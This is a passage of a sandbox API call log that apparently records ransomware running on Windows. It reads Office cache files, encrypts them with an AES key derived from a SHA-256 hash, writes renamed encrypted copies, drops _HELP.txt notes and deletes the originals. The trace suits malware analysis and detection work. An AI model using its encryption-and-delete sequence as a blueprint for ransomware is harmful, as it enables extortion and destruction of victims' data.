pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0119.692] WriteFile (in: hFile=0x344, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0119.692] ReadFile (in: hFile=0x340, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0119.692] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0119.692] WriteFile (in: hFile=0x344, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0119.692] ReadFile (in: hFile=0x340, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0119.692] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0119.692] WriteFile (in: hFile=0x344, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0119.692] ReadFile (in: hFile=0x340, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0119.692] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0119.692] WriteFile (in: hFile=0x344, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0119.692] ReadFile (in: hFile=0x340, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0119.692] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0119.692] WriteFile (in: hFile=0x344, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0119.693] ReadFile (in: hFile=0x340, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0119.693] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0119.693] WriteFile (in: hFile=0x344, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0119.693] ReadFile (in: hFile=0x340, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0119.693] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0119.693] WriteFile (in: hFile=0x344, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0119.693] ReadFile (in: hFile=0x340, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0119.693] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0119.693] WriteFile (in: hFile=0x344, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0119.693] ReadFile (in: hFile=0x340, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0119.693] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0119.693] WriteFile (in: hFile=0x344, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0119.693] ReadFile (in: hFile=0x340, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0119.693] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0119.693] WriteFile (in: hFile=0x344, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0119.693] ReadFile (in: hFile=0x340, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0119.693] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0119.693] WriteFile (in: hFile=0x344, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0119.693] ReadFile (in: hFile=0x340, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0119.693] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0119.693] WriteFile (in: hFile=0x344, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0119.694] ReadFile (in: hFile=0x340, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0119.694] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0119.694] WriteFile (in: hFile=0x344, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0119.694] ReadFile (in: hFile=0x340, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0119.694] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0119.694] WriteFile (in: hFile=0x344, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0119.694] ReadFile (in: hFile=0x340, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0119.694] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0119.694] WriteFile (in: hFile=0x344, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0119.694] ReadFile (in: hFile=0x340, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0119.960] CryptDestroyHash (hHash=0x284d528) returned 1 [0119.960] CryptDestroyKey (hKey=0x284d568) returned 1 [0119.960] CryptReleaseContext (hProv=0xa52128, dwFlags=0x0) returned 1 [0119.961] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\_HELP.txt" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\_help.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x326bfec, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x344 [0119.961] GetFileType (hFile=0x344) returned 0x1 [0119.961] GetLastError () returned 0x0 [0119.961] SetLastError (dwErrCode=0x0) [0119.961] GetLastError () returned 0x0 [0119.961] SetLastError (dwErrCode=0x0) [0119.961] WriteFile (in: hFile=0x344, lpBuffer=0x326ac20*, nNumberOfBytesToWrite=0xed, lpNumberOfBytesWritten=0x326ac1c, lpOverlapped=0x0 | out: lpBuffer=0x326ac20*, lpNumberOfBytesWritten=0x326ac1c*=0xed, lpOverlapped=0x0) returned 1 [0119.962] CloseHandle (hObject=0x344) returned 1 [0119.963] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\excelmui.msi")) returned 1 [0119.966] FindNextFileW (in: hFindFile=0x284d4e8, lpFindFileData=0x326c168 | out: lpFindFileData=0x326c168) returned 1 [0119.966] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ExcelMUI.xml", cchWideChar=-1, lpMultiByteStr=0x326cc70, cbMultiByte=260, lpDefaultChar=0x326c44f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ExcelMUI.xml", lpUsedDefaultChar=0x0) returned 13 [0119.966] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\excelmui.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000000, hTemplateFile=0x0) returned 0x344 [0119.966] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml.VNE3fKaJ" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\excelmui.xml.vne3fkaj"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x340 [0119.967] CryptAcquireContextW (in: phProv=0x326bfec, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326bfec*=0xa52128) returned 1 [0119.968] CryptCreateHash (in: hProv=0xa52128, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326bff0 | out: phHash=0x326bff0) returned 1 [0119.968] CryptHashData (hHash=0x284d5a8, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0119.968] CryptDeriveKey (in: hProv=0xa52128, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326bfe4 | out: phKey=0x326bfe4*=0x284d568) returned 1 [0119.968] GetFileSize (in: hFile=0x344, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x61d [0119.968] ReadFile (in: hFile=0x344, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0120.002] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0120.002] WriteFile (in: hFile=0x340, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0120.003] ReadFile (in: hFile=0x344, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0120.003] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0120.003] WriteFile (in: hFile=0x340, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0120.003] ReadFile (in: hFile=0x344, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0120.003] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0120.003] WriteFile (in: hFile=0x340, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0120.003] ReadFile (in: hFile=0x344, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0120.003] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0120.003] WriteFile (in: hFile=0x340, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0120.003] ReadFile (in: hFile=0x344, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0120.003] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0120.003] WriteFile (in: hFile=0x340, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0120.004] ReadFile (in: hFile=0x344, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0120.004] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0120.004] WriteFile (in: hFile=0x340, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0120.004] ReadFile (in: hFile=0x344, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0120.004] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0120.004] WriteFile (in: hFile=0x340, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0120.004] ReadFile (in: hFile=0x344, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0120.004] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0120.004] WriteFile (in: hFile=0x340, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0120.004] ReadFile (in: hFile=0x344, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0120.004] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0120.004] WriteFile (in: hFile=0x340, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0120.004] ReadFile (in: hFile=0x344, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0120.004] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0120.004] WriteFile (in: hFile=0x340, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0120.004] ReadFile (in: hFile=0x344, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0120.004] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0120.004] WriteFile (in: hFile=0x340, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0120.004] ReadFile (in: hFile=0x344, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0120.004] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0120.004] WriteFile (in: hFile=0x340, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0120.005] ReadFile (in: hFile=0x344, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x1d, lpOverlapped=0x0) returned 1 [0120.005] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x1d, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x20) returned 1 [0120.005] WriteFile (in: hFile=0x340, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x20, lpOverlapped=0x0) returned 1 [0120.005] ReadFile (in: hFile=0x344, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x0, lpOverlapped=0x0) returned 1 [0120.005] CloseHandle (hObject=0x344) returned 1 [0120.005] CloseHandle (hObject=0x340) returned 1 [0120.005] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0120.005] CryptDestroyKey (hKey=0x284d568) returned 1 [0120.005] CryptReleaseContext (hProv=0xa52128, dwFlags=0x0) returned 1 [0120.006] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\_HELP.txt" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\_help.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x326bfec, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x340 [0120.007] GetFileType (hFile=0x340) returned 0x1 [0120.007] GetLastError () returned 0xb7 [0120.007] SetLastError (dwErrCode=0xb7) [0120.007] GetLastError () returned 0xb7 [0120.007] SetLastError (dwErrCode=0xb7) [0120.007] WriteFile (in: hFile=0x340, lpBuffer=0x326ac20*, nNumberOfBytesToWrite=0xed, lpNumberOfBytesWritten=0x326ac1c, lpOverlapped=0x0 | out: lpBuffer=0x326ac20*, lpNumberOfBytesWritten=0x326ac1c*=0xed, lpOverlapped=0x0) returned 1 [0120.008] CloseHandle (hObject=0x340) returned 1 [0120.008] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\excelmui.xml")) returned 1 [0120.009] FindNextFileW (in: hFindFile=0x284d4e8, lpFindFileData=0x326c168 | out: lpFindFileData=0x326c168) returned 1 [0120.009] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Setup.xml", cchWideChar=-1, lpMultiByteStr=0x326cc70, cbMultiByte=260, lpDefaultChar=0x326c44f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Setup.xml", lpUsedDefaultChar=0x0) returned 10 [0120.009] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, 